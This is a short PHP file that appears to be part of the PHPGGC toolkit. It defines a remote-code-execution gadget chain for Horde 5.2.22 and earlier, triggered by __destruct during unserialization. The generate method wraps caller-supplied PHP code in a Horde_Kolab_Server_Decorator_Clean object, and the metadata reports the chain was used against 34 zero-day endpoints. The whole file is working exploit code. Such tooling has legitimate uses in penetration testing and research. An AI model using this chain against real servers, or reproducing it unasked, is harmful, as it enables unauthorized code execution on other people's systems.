<?php
namespace GadgetChain\Horde;
class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
{
public static $version = '<= 5.2.22';
public static $vector = '__destruct';
public static $foundby = 'EgiX';
public static $author = 'mr_me';
public static $information = '
This chain was used against 34 different 0day endpoints targeting Horde v5.2.22. Other versions are probably affected
See https://srcincite.io/blog/2020/08/19/a-smorgashorde-of-vulnerabilities-a-comparative-analysis-of-discovery.html
';
public function generate(array $parameters)
{
$code = $parameters['code'] . ';die;';
return new \Horde_Kolab_Server_Decorator_Clean($code);
}
}
?>